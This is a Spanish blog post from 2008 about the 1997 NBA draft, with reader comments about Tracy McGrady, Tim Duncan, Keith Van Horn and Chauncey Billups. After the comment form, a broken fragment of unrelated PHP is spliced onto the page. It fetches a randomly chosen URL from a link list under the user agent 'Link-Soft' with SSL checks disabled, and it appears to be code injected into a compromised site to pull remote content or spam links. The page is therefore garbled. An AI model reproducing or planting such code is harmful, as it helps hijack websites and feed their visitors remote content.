La prisa por hacerse mayor rápido: Draft 1997

02 de June de 2008 por Viva_Dirk

Hace unos meses comencé esta serie de artículos. Durante este tiempo he respetado la actualidad de la liga que ha sido apasionante, mas aun llegados los play-offs, pero ahora aprovecho la espera de las finales para daros la murga con un tema que me preocupa. Este artículo es el tercero de la serie, después de 1995 y 1996 llega el del 97 y llegaremos hasta el de este mismo año después de que se juegue la final.

En 1997 aun era difícil encontrar elecciones altas de jugadores muy jóvenes, pese a lo que había demostrado Kevin Garnett y algunos de los freshman elegidos en e1 96.

La excepción de este año fue Tracy McGrady que llegó a Toronto desde Mount Zion Academy en la novena elección. Sus 2 primeros años en la liga fueron de adaptación, disputando 20 minutos de media entre ambas temporadas, con problemas en el tiro exterior, el control del balón y para encontrar a sus compañeros, aspectos en los que sufrió el brutal cambio de nivel y su propia inexperiencia. Explotó de forma definitiva a los 21 años, edad correspondiente a su tercer año en la universidad.

En el lado opuesto a McGrady llegaba Tim Duncan, que habia completado su ciclo universitario en Wake Forest y habia sido elegido mejor jugador del país en las 3 últimas campañas; sobra decir cualquier cosa sobre Duncan, sólo destacar que su adaptación a la liga fue tan natural que sirvió para que los Spurs ganasen el anillo con él de protagonista destacado. Pocos jugadores son capaces de conseguir 21.1 puntos, 11.9 rebotes y 2,5 tapones de media durante la temporada regular y 20.7 puntos, 9 rebotes y 2.6 tapones durante sus primeros playoffs. También habia completado sus 4 años universitarios el Nº2 del draft, Keith Van Horn, con una media de 20.8 puntos y un 40% en triples. Recaló en los Nets y tampoco tuvo ningún problema en adaptarse a la liga finalizándola con números similares a los que ofrecía en la universidad. Para acabar con los nombre propios, Chauncey Billups fue el Nº3 del aquel año y tuvo un comienzo titubeante en la liga tras sus 2 años de universidad. Billups era uno de esos especimenes que empezaban a surgir, un base anotador y poco distribuidor de juego, un tipo de jugador para el que la experiencia es un papel fundamental, de modo que el chico no explotó hasta su sexta temporada en la liga.

El resto del top-10 se completó con jugadores que nunca alcanzaron el nivel esperado, como Antonio Daniels o Adonal Foyle, ambos de universidades muy pequeñas donde habían cumplido sus 4 años, y el resto jugadores que no completaron el ciclo y en su mayoria tampoco estuvieron 3 años en la universidad.

Comenta

3 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Qué gran serie de artículo, Viva… los he descubierto ahora.

    Hay que ver la de cosas que uno olvida con el paso del tiempo y lo interesante que resulta revisarlas en estos momentos…

    Qué extraña hornada fue ésta del 97 y qué buena pinta tenía Van Horn cuando llegó a la liga. ¿cómo es posible que sufriera un declive tan inmediato??

      Citar

  2. Viva_Dirk dice:
    #2

    A Van Horn le mataron las lesiones, problemas físicos graves a una edad no muy avanzada. Aun así sus promedios en 9 años en la liga son de 16 puntos y casi 7 rebotes.

    A ver si antes del draft de este año da tiempo a llegar al draft de Pau, y una vez elegidos los de este año los mas cercanos, para que la conclusión que voy a sacar este mas fresca.

      Citar

  3. planetbasket.net dice:
    #3

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>